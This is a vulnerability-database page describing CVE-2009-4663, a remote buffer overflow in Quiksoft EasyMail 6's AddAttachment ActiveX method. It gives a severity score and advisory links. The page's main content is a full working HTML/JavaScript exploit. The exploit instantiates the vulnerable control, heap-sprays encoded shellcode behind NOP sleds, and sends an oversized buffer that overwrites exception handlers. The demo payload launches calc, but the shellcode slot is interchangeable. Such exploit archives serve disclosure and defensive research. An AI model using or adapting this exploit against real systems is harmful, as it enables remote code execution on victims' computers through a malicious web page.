Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow
2010-03-07 / 2010-03-08
Credit:
bmgsec
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2009-4663
CWE:
CWE-119
CVSS Base Score:
9.3/10
Impact Subscore:
10/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
Complete
Integrity impact:
Complete
Availability impact:
Complete
<html> <head> <!-- -- Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit -- -- Its old and the latest version doesn't support this method. -- I was bored and a similar post sparked my interest. -- -- Advisory: http://www.bmgsec.com.au/advisory/48/ -- -- Written by: -- bmgsec (bmgsec [at] gmail.com / www.bmgsec.com.au) -- --> <title>Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit</title> <object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='test'></object> <script language='javascript'> function str_repeat ( input, multiplier ) { return new Array(multiplier+1).join(input); } //windows/exec CMD: calc Size: 144 bytes Encoder: x86/shikata_ga_nai ExitFunc: SEH shellcode = unescape("%uc931%u1eb1%ue2b8%udc1f%ud9cc%ud9e5%u2474%u5bf4%u4331%u830f%ufceb"+ "%u4303%ufde9%u3029%u4505%uc9d2%ucdd5%uf597%uad5e%u7e12%ua161%u3196"+ "%ub679%uedf6%u2378%u6541%u384e%u9753%ufe9f%ucbcd%u3e5b%u1499%u75a2"+ "%u1a6f%u61e6%u2784%u51b2%u2d61%u11df%ue936%ucd1e%u7aaf%u5a2c%u22bb"+ "%u5d30%u5750%ud654%u83a7%ub4ed%u5783%u1b2e%ua1fd%uf2d0%uc699%ucb56"+ "%u99ea%ua05a%u059d%u3dcf%u3e35%uba86%ufe45%u6af2%u0f22%u8f88%u87ed"+ "%u7114%u569b%u7173%u057b%ue11a%ucae7"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length - slackspace); while (block.length + slackspace < 200000) block = block + block + fillblock; memory = new Array(); for (i=0; i<500; i++) memory[i] = block + shellcode; buffer = str_repeat('A', 433); buffer += "BBBB"; buffer += str_repeat(unescape("%0b%0b%0b%0b"), 63); test.AddAttachment(buffer, 1); </script> </head> </html>
References:
http://xforce.iss.net/xforce/xfdb/53325
http://www.securityfocus.com/bid/36440
http://www.milw0rm.com/exploits/9705
http://www.bmgsec.com.au/advisories/easymail-6-activex-exploit.txt
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top